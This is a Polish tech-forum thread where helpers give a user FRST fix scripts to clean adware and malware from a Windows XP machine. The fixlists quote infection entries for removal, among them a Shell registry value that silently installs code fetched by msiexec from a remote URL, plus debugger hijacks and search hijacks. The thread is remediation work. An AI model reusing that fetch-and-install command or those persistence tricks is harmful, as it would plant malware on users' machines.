Elektroda.pl
Elektroda.pl
X
Proszę, dodaj wyjątek www.elektroda.pl do Adblock.
Dzięki temu, że oglądasz reklamy, wspierasz portal i użytkowników.

Proszę o sprawdzenie - logi FRST

piotrek303 17 Cze 2017 00:46 468 6
  • Pomocny post
    #2 17 Cze 2017 06:31
    krzychupar
    Poziom 41  

    Odinstaluj:
    AVG Web TuneUp
    AVG Protection

    Otwórz notatnik systemowy i wklej:

    Task: C:\WINDOWS\Tasks\AVG EUpdate Task.job => C:\Program Files\AVG\Setup AVG Technologies  0 ߡ    0ߡ   
    Task: C:\WINDOWS\Tasks\Opera scheduled Autoupdate 1460049706.job => C:\Program Files\Opera\launcher.exe
    Task: C:\WINDOWS\Tasks\Powiadomienie o zakończeniu obsługi systemu Microsoft Windows XP — co miesiąc.job => C:\WINDOWS\system32\xp_eos.exe
    Task: C:\WINDOWS\Tasks\Powiadomienie o zakończeniu obsługi systemu Microsoft Windows XP — logowanie.job => C:\WINDOWS\system32\xp_eos.exe
    ShortcutWithArgument: C:\Documents and Settings\Adam\Menu Start\Programy\Akcesoria\Narzędzia systemowe\Internet Explorer (bez dodatków).lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.nuesearch.com/?type=sc&ts=14708610...=wpm0808&uid=ST9250827AS_5RG1THAYXXXX5RG1THAY
    ShortcutWithArgument: C:\Documents and Settings\Adam\Dane aplikacji\Microsoft\Internet Explorer\Quick Launch\Opera.lnk -> C:\Program Files\Opera\launcher.exe (Opera Software) -> hxxp://www.nuesearch.com/?type=sc&ts=14708610...=wpm0808&uid=ST9250827AS_5RG1THAYXXXX5RG1THAY
    HKU\S-1-5-21-2569541432-1215264409-1273387394-1006\...\Run: [] => [X]
    HKU\S-1-5-21-2569541432-1215264409-1273387394-1006\...\MountPoints2: {008a60b4-b147-11e5-b0d4-0022152be7c9} - H:\RunDlg.exe
    HKU\S-1-5-21-2569541432-1215264409-1273387394-1006\...\MountPoints2: {008a60ba-b147-11e5-b0d4-02275404057d} - I:\HTC_Sync_Manager_PC.exe
    HKU\S-1-5-21-2569541432-1215264409-1273387394-1006\...\MountPoints2: {015add16-b2e5-11e1-82b2-0022152be7c9} - G:\MicroLauncher.exe
    HKU\S-1-5-21-2569541432-1215264409-1273387394-1006\...\MountPoints2: {04c9565b-4271-11e0-8203-0022152be7c9} - H:\AutoRun.exe
    HKU\S-1-5-21-2569541432-1215264409-1273387394-1006\...\MountPoints2: {04c9565d-4271-11e0-8203-0022152be7c9} - H:\AutoRun.exe
    HKU\S-1-5-21-2569541432-1215264409-1273387394-1006\...\MountPoints2: {05c81787-8dda-11e4-ac5b-0022152be7c9} - H:\HTC_Sync_Manager_PC.exe
    HKU\S-1-5-21-2569541432-1215264409-1273387394-1006\...\MountPoints2: {082fa84e-a1cf-11e1-82a8-0022152be7c9} - G:\AutoRun.exe
    HKU\S-1-5-21-2569541432-1215264409-1273387394-1006\...\MountPoints2: {0e1e0d66-4012-11df-8188-0022152be7c9} - H:\AutoRunCardDetector.exe
    HKU\S-1-5-21-2569541432-1215264409-1273387394-1006\...\MountPoints2: {19b6d443-0d16-11e0-81f2-0022152be7c9} - H:\AutoRun.exe
    HKU\S-1-5-21-2569541432-1215264409-1273387394-1006\...\MountPoints2: {19b6d445-0d16-11e0-81f2-0022152be7c9} - H:\AutoRun.exe




    HKU\S-1-5-21-2569541432-1215264409-1273387394-1006\...\MountPoints2: {1a2cb74c-4290-11e1-8279-0022152be7c9} - H:\AutoRun.exe
    HKU\S-1-5-21-2569541432-1215264409-1273387394-1006\...\MountPoints2: {278d6b50-fcd4-11df-81e9-0022152be7c9} - H:\AutoRun.exe
    HKU\S-1-5-21-2569541432-1215264409-1273387394-1006\...\MountPoints2: {290f6ba8-6a9f-11df-819f-0015afc3ece6} - H:\AutoRunCardDetector.exe
    HKU\S-1-5-21-2569541432-1215264409-1273387394-1006\...\MountPoints2: {31770d26-d2c0-11df-81de-0022152be7c9} - H:\AutoRun.exe
    HKU\S-1-5-21-2569541432-1215264409-1273387394-1006\...\MountPoints2: {31770d28-d2c0-11df-81de-0022152be7c9} - H:\AutoRun.exe
    HKU\S-1-5-21-2569541432-1215264409-1273387394-1006\...\MountPoints2: {31770d2a-d2c0-11df-81de-0015afc3ece6} - H:\AutoRun.exe
    HKU\S-1-5-21-2569541432-1215264409-1273387394-1006\...\MountPoints2: {375fea2a-8cfb-11de-80b7-0015afc3ece6} - I:\.\EncryptionTool\MaxtorEncryption.exe
    HKU\S-1-5-21-2569541432-1215264409-1273387394-1006\...\MountPoints2: {38029afa-54fa-11df-8197-0022152be7c9} - H:\AutoRunCardDetector.exe
    HKU\S-1-5-21-2569541432-1215264409-1273387394-1006\...\MountPoints2: {3c43d11d-ed0a-11df-81e7-0022152be7c9} - H:\AutoRun.exe
    HKU\S-1-5-21-2569541432-1215264409-1273387394-1006\...\MountPoints2: {3c43d11f-ed0a-11df-81e7-0022152be7c9} - H:\AutoRun.exe
    HKU\S-1-5-21-2569541432-1215264409-1273387394-1006\...\MountPoints2: {3c43d121-ed0a-11df-81e7-0022152be7c9} - H:\AutoRun.exe
    HKU\S-1-5-21-2569541432-1215264409-1273387394-1006\...\MountPoints2: {419cb868-364b-11e1-8271-0022152be7c9} - G:\AutoRun.exe
    HKU\S-1-5-21-2569541432-1215264409-1273387394-1006\...\MountPoints2: {481a0d4c-e83e-11df-81e6-0022152be7c9} - H:\AutoRun.exe
    HKU\S-1-5-21-2569541432-1215264409-1273387394-1006\...\MountPoints2: {481a0d4f-e83e-11df-81e6-0022152be7c9} - H:\AutoRun.exe
    HKU\S-1-5-21-2569541432-1215264409-1273387394-1006\...\MountPoints2: {4effef9c-7db0-11e1-82a2-0022152be7c9} - I:\AutoRunCardDetector.exe
    HKU\S-1-5-21-2569541432-1215264409-1273387394-1006\...\MountPoints2: {56366b4e-e4c6-11df-81e4-0022152be7c9} - H:\AutoRun.exe
    HKU\S-1-5-21-2569541432-1215264409-1273387394-1006\...\MountPoints2: {56366b50-e4c6-11df-81e4-0022152be7c9} - H:\AutoRun.exe
    HKU\S-1-5-21-2569541432-1215264409-1273387394-1006\...\MountPoints2: {56366b52-e4c6-11df-81e4-0022152be7c9} - H:\AutoRun.exe
    HKU\S-1-5-21-2569541432-1215264409-1273387394-1006\...\MountPoints2: {56366b54-e4c6-11df-81e4-0022152be7c9} - H:\AutoRun.exe
    HKU\S-1-5-21-2569541432-1215264409-1273387394-1006\...\MountPoints2: {5e915840-f4dc-11e1-82d2-0022152be7c9} - H:\MicroLauncher.exe
    HKU\S-1-5-21-2569541432-1215264409-1273387394-1006\...\MountPoints2: {5e915844-f4dc-11e1-82d2-0022152be7c9} - G:\AutoRunCardDetector.exe
    HKU\S-1-5-21-2569541432-1215264409-1273387394-1006\...\MountPoints2: {68c1bd68-d260-11df-81dc-0022152be7c9} - H:\AutoRun.exe
    HKU\S-1-5-21-2569541432-1215264409-1273387394-1006\...\MountPoints2: {72c9d726-d244-11df-81da-0022152be7c9} - H:\AutoRun.exe
    HKU\S-1-5-21-2569541432-1215264409-1273387394-1006\...\MountPoints2: {72c9d728-d244-11df-81da-0022152be7c9} - H:\AutoRun.exe
    HKU\S-1-5-21-2569541432-1215264409-1273387394-1006\...\MountPoints2: {7777bdd0-966b-11e3-83ae-0022152be7c9} - G:\MicroLauncher.exe
    HKU\S-1-5-21-2569541432-1215264409-1273387394-1006\...\MountPoints2: {7777bdd2-966b-11e3-83ae-0022152be7c9} - G:\MicroLauncher.exe
    HKU\S-1-5-21-2569541432-1215264409-1273387394-1006\...\MountPoints2: {79c47ad8-fe33-11e5-b1cc-0022152be7c9} - G:\MicroLauncher.exe
    HKU\S-1-5-21-2569541432-1215264409-1273387394-1006\...\MountPoints2: {7b7f1dca-e4c0-11df-81e3-0022152be7c9} - H:\AutoRun.exe
    HKU\S-1-5-21-2569541432-1215264409-1273387394-1006\...\MountPoints2: {7b7f1dcc-e4c0-11df-81e3-0022152be7c9} - H:\AutoRun.exe
    HKU\S-1-5-21-2569541432-1215264409-1273387394-1006\...\MountPoints2: {7b7f1dce-e4c0-11df-81e3-0022152be7c9} - H:\AutoRun.exe
    HKU\S-1-5-21-2569541432-1215264409-1273387394-1006\...\MountPoints2: {7df9fc91-9d91-11e0-821b-0022152be7c9} - I:\AutoRun.exe
    HKU\S-1-5-21-2569541432-1215264409-1273387394-1006\...\MountPoints2: {7e3d64ab-959f-11e0-8218-0022152be7c9} - I:\AutoRun.exe
    HKU\S-1-5-21-2569541432-1215264409-1273387394-1006\...\MountPoints2: {7e3d64ad-959f-11e0-8218-0022152be7c9} - I:\AutoRun.exe
    HKU\S-1-5-21-2569541432-1215264409-1273387394-1006\...\MountPoints2: {7e3d64af-959f-11e0-8218-0022152be7c9} - I:\AutoRun.exe
    HKU\S-1-5-21-2569541432-1215264409-1273387394-1006\...\MountPoints2: {87ce7cdc-54bc-11e0-820b-0022152be7c9} - I:\AutoRun.exe
    HKU\S-1-5-21-2569541432-1215264409-1273387394-1006\...\MountPoints2: {87ce7cde-54bc-11e0-820b-0022152be7c9} - I:\AutoRun.exe
    HKU\S-1-5-21-2569541432-1215264409-1273387394-1006\...\MountPoints2: {99feb76a-fecb-11dd-8010-0022152be7c9} - G:\qphdin.com
    HKU\S-1-5-21-2569541432-1215264409-1273387394-1006\...\MountPoints2: {9f3b2caa-2b88-11df-816b-0022152be7c9} - H:\AutoRunCardDetector.exe
    HKU\S-1-5-21-2569541432-1215264409-1273387394-1006\...\MountPoints2: {a2c794bc-a413-11e0-821c-0022152be7c9} - I:\AutoRun.exe
    HKU\S-1-5-21-2569541432-1215264409-1273387394-1006\...\MountPoints2: {a2c794be-a413-11e0-821c-0022152be7c9} - J:\AutoRun.exe
    HKU\S-1-5-21-2569541432-1215264409-1273387394-1006\...\MountPoints2: {b47f74a8-f816-11df-81e8-0022152be7c9} - sojcice/obucicarapice.exe
    HKU\S-1-5-21-2569541432-1215264409-1273387394-1006\...\MountPoints2: {b6d67068-157b-11e4-8544-0022152be7c9} - H:\HTC_Sync_Manager_PC.exe
    HKU\S-1-5-21-2569541432-1215264409-1273387394-1006\...\MountPoints2: {c07cb3b6-9523-11df-81c0-0022152be7c9} - I:\LaunchU3.exe -a
    HKU\S-1-5-21-2569541432-1215264409-1273387394-1006\...\MountPoints2: {cc5d75e0-f2be-11e0-8242-0022152be7c9} - I:\AutoRun.exe
    HKU\S-1-5-21-2569541432-1215264409-1273387394-1006\...\MountPoints2: {cf462e47-9196-11e4-ac6a-0022152be7c9} - H:\HTC_Sync_Manager_PC.exe
    HKU\S-1-5-21-2569541432-1215264409-1273387394-1006\...\MountPoints2: {de8fd23e-e0d8-11de-811e-0015afc3ece6} - H:\LaunchU3.exe -a
    HKU\S-1-5-21-2569541432-1215264409-1273387394-1006\...\MountPoints2: {f33fa628-47d9-11e0-8206-0022152be7c9} - H:\AutoRun.exe
    HKU\S-1-5-21-2569541432-1215264409-1273387394-1006\...\MountPoints2: {f6f634e8-6a5a-11de-808b-0022152be7c9} - I:\AutoRunCardDetector.exe
    HKU\S-1-5-21-2569541432-1215264409-1273387394-1006\...\MountPoints2: {ffe67ff1-e19f-11df-81e2-0022152be7c9} - H:\AutoRun.exe
    IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe
    IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe
    ShellIconOverlayIdentifiers: [ DropboxExt10] -> {FB314EE2-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files\Dropbox\Client\DropboxExt.3.0.dll -> Brak pliku
    ShellIconOverlayIdentifiers: [ DropboxExt9] -> {FB314EE1-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files\Dropbox\Client\DropboxExt.3.0.dll -> Brak pliku
    ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku
    ShellIconOverlayIdentifiers: [00avg] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku
    HKLM\Software\Microsoft\Internet Explorer\Main,Start Page =
    HKLM\Software\Microsoft\Internet Explorer\Main,Search Page =
    HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL =
    HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL =
    HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://securityresponse.symantec.com/avcenter/fix_homepage/
    HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
    HKU\S-1-5-19\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://securityresponse.symantec.com/avcenter/fix_homepage/
    HKU\S-1-5-19\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
    HKU\S-1-5-20\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://securityresponse.symantec.com/avcenter/fix_homepage/
    HKU\S-1-5-20\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
    HKU\S-1-5-21-2569541432-1215264409-1273387394-1006\Software\Microsoft\Internet Explorer\Main,Start Page =
    SearchScopes: HKU\.DEFAULT -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL =
    SearchScopes: HKU\S-1-5-21-2569541432-1215264409-1273387394-1006 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
    SearchScopes: HKU\S-1-5-21-2569541432-1215264409-1273387394-1006 -> {56256A51-B582-467e-B8D4-7786EDA79AE0} URL =
    SearchScopes: HKU\S-1-5-21-2569541432-1215264409-1273387394-1006 -> {C3F4F817-C144-45D8-A386-3C3F7AF0A3A0} URL =
    BHO: Brak nazwy -> {6D023EBF-70B8-45A6-9ED5-556515FA0FE4} -> Brak pliku
    Toolbar: HKLM - Brak nazwy - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - Brak pliku
    Toolbar: HKLM - Brak nazwy - {D3DEE18F-DB64-4BEB-9FF1-E1F0A5033E4A} - Brak pliku
    Toolbar: HKU\S-1-5-21-2569541432-1215264409-1273387394-1006 -> Brak nazwy - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - Brak pliku
    Toolbar: HKU\S-1-5-21-2569541432-1215264409-1273387394-1006 -> Brak nazwy - {D3DEE18F-DB64-4BEB-9FF1-E1F0A5033E4A} - Brak pliku
    Toolbar: HKU\S-1-5-21-2569541432-1215264409-1273387394-1006 -> Brak nazwy - {463DF6D5-BEC1-4D67-B217-59DB692DFC53} - Brak pliku
    DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} hxxps://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
    FF NewTab: C:\Documents and Settings\Adam\Dane aplikacji\Mozilla\Firefox\Profiles\zn2n7cbx.default -> hxxp://www.nicesearches.com?type=hp&ts=145988...&z=222fdd0a45bc9d2316bd3a6gdz8wet2b6bagaw7eae
    FF Homepage: C:\Documents and Settings\Adam\Dane aplikacji\Mozilla\Firefox\Profiles\zn2n7cbx.default -> about:home
    FF NetworkProxy: C:\Documents and Settings\Adam\Dane aplikacji\Mozilla\Firefox\Profiles\zn2n7cbx.default -> type", 0
    FF HKLM\...\Thunderbird\Extensions: [eplgTb@eset.com] - C:\Program Files\ESET\ESET NOD32 Antivirus\Mozilla Thunderbird => nie znaleziono
    FF Plugin HKU\S-1-5-21-2569541432-1215264409-1273387394-1006: @facebook.com/FBPlugin,version=1.0.1 -> C:\Documents and Settings\Adam\Dane aplikacji\Facebook\npfbplugin_1_0_1.dll [Brak pliku]
    FF Plugin HKU\S-1-5-21-2569541432-1215264409-1273387394-1006: @facebook.com/FBPlugin,version=1.0.3 -> C:\Documents and Settings\Adam\Dane aplikacji\Facebook\npfbplugin_1_0_3.dll [Brak pliku]
    FF Plugin HKU\S-1-5-21-2569541432-1215264409-1273387394-1006: @tools.google.com/Google Update;version=8 -> C:\Documents and Settings\Adam\Ustawienia lokalne\Dane aplikacji\Google\Update\1.2.183.39\npGoogleOneClick8.dll [Brak pliku]
    S2 Convxxxx; "C:\Documents and Settings\Adam\Dane aplikacji\ficfi\UvConverter.exe" {2C8E8C85-942B-451C-8243-97A089265577} [X]
    U2 FFModules; "C:\Program Files\ffgogogo Browser\bin\browserServer.exe" -runsvc [X]
    S3 BlueletAudio; system32\DRIVERS\blueletaudio.sys [X]
    S3 BlueletSCOAudio; system32\DRIVERS\BlueletSCOAudio.sys [X]
    S3 BT; system32\DRIVERS\btnetdrv.sys [X]
    S3 Btcsrusb; System32\Drivers\btcusb.sys [X]
    S0 BTHidEnum; System32\Drivers\vbtenum.sys [X]
    S0 BTHidMgr; System32\Drivers\BTHidMgr.sys [X]
    U2 CSHMDR; Brak ImagePath
    U2 CWASRE; Brak ImagePath
    S3 dtscsi; \SystemRoot\System32\Drivers\dtscsi.sys [X]
    S3 hwdatacard; system32\DRIVERS\ewusbmdm.sys [X]
    S3 hwusbdev; system32\DRIVERS\ewusbdev.sys [X]
    S3 hwusbfake; system32\DRIVERS\ewusbfake.sys [X]
    S4 IntelIde; Brak ImagePath
    S3 massfilter; system32\drivers\massfilter.sys [X]
    S3 mdf15; \??\C:\Program Files\Clarus\Samsung SecretZone\mdf15.sys [X]
    S3 mvd21; \??\C:\Program Files\Clarus\Samsung SecretZone\mvd21.sys [X]
    S3 NPF; system32\drivers\npf.sys [X]
    U2 snare; Brak ImagePath
    S3 SymIM; system32\DRIVERS\SymIM.sys [X]
    S3 SymIMMP; system32\DRIVERS\SymIM.sys [X]
    S3 VComm; system32\DRIVERS\VComm.sys [X]
    S3 VcommMgr; System32\Drivers\VcommMgr.sys [X]
    U4 WMCoreService; Brak ImagePath
    U1 WS2IFSL; Brak ImagePath
    S3 ZTEusbmdm6k; system32\DRIVERS\ZTEusbmdm6k.sys [X]
    S3 ZTEusbnmea; system32\DRIVERS\ZTEusbnmea.sys [X]
    S3 ZTEusbser6k; system32\DRIVERS\ZTEusbser6k.sys [X]
    2017-06-16 18:51 - 2017-06-16 18:52 - 00000000 ____D C:\Documents and Settings\Adam\Ustawienia lokalne\Dane aplikacji\AVG Web TuneUp
    2017-06-16 18:46 - 2017-06-16 18:46 - 00000000 ___HD C:\$AV_AVG
    2017-06-16 17:46 - 2017-06-16 17:46 - 00000000 __HDC C:\WINDOWS\$NtUninstallWdf01009$
    2017-06-16 17:45 - 2017-06-16 23:45 - 00000292 ____H C:\WINDOWS\Tasks\Antivirus Emergency Update.job
    2017-06-04 20:00 - 2017-06-04 20:00 - 00000000 __SHD C:\found.000
    2017-05-31 11:07 - 2017-05-31 11:14 - 00000000 ____D C:\Program Files\592E87CD_cacayima
    2017-06-03 11:29 - 2017-06-03 11:29 - 00000114 _____ C:\Documents and Settings\LocalService\Dane aplikacji\WB.CFG
    2017-05-31 11:07 - 2017-05-31 11:14 - 00000000 ____D C:\Program Files\592E87CD_cacayima
    2017-06-16 23:45 - 2014-03-08 21:16 - 00000220 _____ C:\WINDOWS\Tasks\Powiadomienie o zakończeniu obsługi systemu Microsoft Windows XP — logowanie.job
    2017-06-16 20:09 - 2017-03-01 20:18 - 00000000 ____D C:\Documents and Settings\Adam\Dane aplikacji\Kyubey
    2017-06-08 15:00 - 2014-03-08 21:16 - 00000214 _____ C:\WINDOWS\Tasks\Powiadomienie o zakończeniu obsługi systemu Microsoft Windows XP — co miesiąc.job
    EmptyTemp:

    Plik zapisz pod nazwą fixlist.txt i umieść obok FRST w tym samym folderze.
    Uruchom FRST i kliknij w Fix/Napraw.

    Po wykonaniu zamieść nowe logi z FRST.

    0
  • #4 17 Cze 2017 09:30
    Kolobos
    Spec od komputerów

    Zrob kopie zakladek z FF, skrypt usunie profile utworzone przez infekcje.

    Wykonaj Fixlist.txt dla FRST:
    HKU\S-1-5-21-2569541432-1215264409-1273387394-1006\...\Run: [Power2GoExpress] => NA
    HKU\S-1-5-21-2569541432-1215264409-1273387394-1006\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i hxxp://point.ltdmsjq.com/?data=zDlkMj8cNWVQNkI4NkY2OUNWNWlQMWH2MTkdMWZXRkMdOWY4RH== /q
    Startup: C:\Documents and Settings\Adam\Menu Start\Programy\Autostart\Torpedo.lnk [2014-12-16]
    FF user.js: detected! => C:\Documents and Settings\Adam\Dane aplikacji\Mozilla\Firefox\Profiles\zn2n7cbx.default\user.js [2016-04-07]
    FF NewTab: C:\Documents and Settings\Adam\Dane aplikacji\Mozilla\Firefox\Profiles\zn2n7cbx.default -> hxxp://www.nicesearches.com?type=hp&ts=145988...&z=222fdd0a45bc9d2316bd3a6gdz8wet2b6bagaw7eae
    FF NetworkProxy: C:\Documents and Settings\Adam\Dane aplikacji\Mozilla\Firefox\Profiles\zn2n7cbx.default -> type", 0
    FF SearchPlugin: C:\Documents and Settings\Adam\Dane aplikacji\Mozilla\Firefox\Profiles\zn2n7cbx.default\searchplugins\yoursites123.xml [2016-03-26]
    FF ProfilePath: C:\Documents and Settings\Adam\Dane aplikacji\ffgogogo\ffgogogo\Profiles\zn2n7cbx.default [2017-04-17]
    FF user.js: detected! => C:\Documents and Settings\Adam\Dane aplikacji\ffgogogo\ffgogogo\Profiles\zn2n7cbx.default\user.js [2016-03-30]
    FF NewTab: C:\Documents and Settings\Adam\Dane aplikacji\ffgogogo\ffgogogo\Profiles\zn2n7cbx.default -> chrome://quick_start/content/index.html
    C:\Documents and Settings\Adam\Dane aplikacji\ffgogogo\
    FF Homepage: C:\Documents and Settings\Adam\Dane aplikacji\ffgogogo\ffgogogo\Profiles\zn2n7cbx.default -> hxxp://www.google.com/
    FF NetworkProxy: C:\Documents and Settings\Adam\Dane aplikacji\ffgogogo\ffgogogo\Profiles\zn2n7cbx.default -> type", 0
    FF Extension: (SimilarWeb) - C:\Documents and Settings\Adam\Dane aplikacji\ffgogogo\ffgogogo\Profiles\zn2n7cbx.default\Extensions\@DA3566E2-F709-11E5-8E87-A604BC8E7F8B.xpi [2016-04-12] [Brak podpisu cyfrowego]
    FF Extension: (FF Adr) - C:\Documents and Settings\Adam\Dane aplikacji\ffgogogo\ffgogogo\Profiles\zn2n7cbx.default\Extensions\@H99KV4DO-UCCF-9PFO-9ZLK-8RRP4FVOKD9O.xpi [2016-08-10] [Brak podpisu cyfrowego]
    FF Extension: (Default NewTab) - C:\Documents and Settings\Adam\Dane aplikacji\ffgogogo\ffgogogo\Profiles\zn2n7cbx.default\Extensions\default_newtabff@gmail.com [2016-03-30] [Brak podpisu cyfrowego]
    FF Extension: (Polski Language Pack) - C:\Documents and Settings\Adam\Dane aplikacji\ffgogogo\ffgogogo\Profiles\zn2n7cbx.default\Extensions\langpack-pl@firefox.mozilla.org.xpi [2016-03-30] [Brak podpisu cyfrowego]
    FF Extension: (Microsoft .NET Framework Assistant) - C:\Documents and Settings\Adam\Dane aplikacji\ffgogogo\ffgogogo\Profiles\zn2n7cbx.default\Extensions\{20a82645-c095-46ed-80e3-08825760534b} [2016-03-30] [Brak podpisu cyfrowego]
    FF SearchPlugin: C:\Documents and Settings\Adam\Dane aplikacji\ffgogogo\ffgogogo\Profiles\zn2n7cbx.default\searchplugins\yoursites123.xml [2016-03-26]
    S4 glory; C:\Documents and Settings\Adam\Ustawienia lokalne\Dane aplikacji\glory\glory.dll [689152 2017-06-16] () [Brak podpisu cyfrowego]
    2017-06-02 15:06 - 2017-06-02 15:06 - 00000000 ____D C:\Documents and Settings\Adam\Ustawienia lokalne\Dane aplikacji\glory
    2017-05-31 21:29 - 2017-06-16 22:10 - 00000000 ____D C:\Documents and Settings\All Users\Dane aplikacji\fjcfi
    2017-05-26 14:42 - 2017-06-16 21:53 - 00000000 ____D C:\Documents and Settings\Adam\Ustawienia lokalne\Dane aplikacji\terana
    2017-05-19 13:51 - 2017-06-16 21:31 - 00000000 ____D C:\Documents and Settings\Adam\Ustawienia lokalne\Dane aplikacji\CSHMDR
    2017-05-18 15:16 - 2017-06-16 22:09 - 00000000 ____D C:\Documents and Settings\All Users\Dane aplikacji\cfjcf
    2017-06-16 22:10 - 2017-05-15 14:25 - 00000000 ____D C:\Documents and Settings\All Users\Dane aplikacji\ibehb
    2017-06-16 22:10 - 2017-04-27 16:27 - 00000000 ____D C:\Documents and Settings\All Users\Dane aplikacji\gjcgj
    2017-06-16 22:10 - 2017-04-26 12:26 - 00000000 ____D C:\Documents and Settings\All Users\Dane aplikacji\hbeha
    2017-06-16 22:10 - 2017-04-05 12:51 - 00000000 ____D C:\Documents and Settings\All Users\Dane aplikacji\dhadg
    2017-06-16 22:10 - 2017-04-01 17:55 - 00000000 ____D C:\Documents and Settings\All Users\Dane aplikacji\fibei
    2017-06-16 22:10 - 2017-03-27 21:08 - 00000000 ____D C:\Documents and Settings\All Users\Dane aplikacji\fjcfj
    2017-06-16 22:10 - 2017-03-18 14:29 - 00000000 ____D C:\Documents and Settings\All Users\Dane aplikacji\dhadh
    2017-06-16 22:10 - 2017-03-15 16:39 - 00000000 ____D C:\Documents and Settings\All Users\Dane aplikacji\ehadh
    2017-06-16 22:10 - 2017-03-02 13:29 - 00000000 ____D C:\Documents and Settings\All Users\Dane aplikacji\ficfi
    2017-06-16 22:10 - 2017-02-23 12:18 - 00000000 ____D C:\Documents and Settings\All Users\Dane aplikacji\dgjcg
    2017-06-16 22:10 - 2017-02-22 12:52 - 00000000 ____D C:\Documents and Settings\All Users\Dane aplikacji\ehaeh
    2017-06-16 22:10 - 2017-02-08 23:44 - 00000000 ____D C:\Documents and Settings\All Users\Dane aplikacji\ibeib
    2017-06-16 22:10 - 2016-12-16 15:18 - 00000000 ____D C:\Documents and Settings\All Users\Dane aplikacji\gadgj
    2017-06-16 22:10 - 2016-12-08 15:49 - 00000000 ____D C:\Documents and Settings\All Users\Dane aplikacji\icfic
    2017-06-16 22:09 - 2017-03-16 13:58 - 00000000 ____D C:\Documents and Settings\All Users\Dane aplikacji\bfibe
    2017-06-16 22:09 - 2017-02-24 16:54 - 00000000 ____D C:\Documents and Settings\All Users\Dane aplikacji\behbe
    2017-06-16 22:09 - 2017-02-08 12:30 - 00000000 ____D C:\Documents and Settings\All Users\Dane aplikacji\cfibf
    2017-06-16 22:09 - 2016-11-10 18:40 - 00000000 ____D C:\Documents and Settings\All Users\Dane aplikacji\beibe
    2017-06-16 22:08 - 2017-03-24 19:59 - 00000000 ____D C:\Documents and Settings\All Users\Dane aplikacji\adhad
    2017-06-16 22:08 - 2017-03-09 21:19 - 00000000 ____D C:\Documents and Settings\All Users\Dane aplikacji\aehad
    2017-06-16 21:31 - 2017-05-15 14:21 - 00000000 ____D C:\Documents and Settings\Adam\Ustawienia lokalne\Dane aplikacji\CWASRE
    2017-06-16 21:30 - 2017-05-11 11:53 - 00000000 ____D C:\Documents and Settings\Adam\Ustawienia lokalne\Dane aplikacji\NPASRE
    2017-06-16 19:57 - 2017-02-13 13:56 - 00000000 ____D C:\Documents and Settings\Adam\Dane aplikacji\WinSAPSvc
    2017-06-16 19:57 - 2016-03-26 15:42 - 00000000 ____D C:\Documents and Settings\Adam\Dane aplikacji\TSv
    2017-06-16 19:57 - 2014-09-26 16:52 - 00000000 ____D C:\Documents and Settings\Adam\Dane aplikacji\sweet-page
    2017-06-16 19:55 - 2016-08-10 22:31 - 00000000 ____D C:\Documents and Settings\Adam\Dane aplikacji\setup1
    2017-06-16 18:46 - 2017-02-06 22:39 - 00000000 ____D C:\Documents and Settings\Adam\Dane aplikacji\ficfi


    Zrob pelny skan przy pomocy Mbam i usun to co wykryje:
    http://www.bleepingcomputer.com/download/malwarebytes-anti-malware/
    oraz http://ftp.drweb.com/pub/drweb/cureit/launch.exe

    Po wykonaniu zamiesc nowe logi z FRST, ze skanowania.

    0
  • Pomocny post
    #6 17 Cze 2017 11:53
    Kolobos
    Spec od komputerów

    Usun katalog C:\FRST i to wszystko.

    0
  • #7 17 Cze 2017 11:57
    piotrek303
    Poziom 13  

    Bardzo dziękuję za udzieloną pomoc.
    Pozdrawiam.
    Proszę o sprawdzenie - logi FRST

    0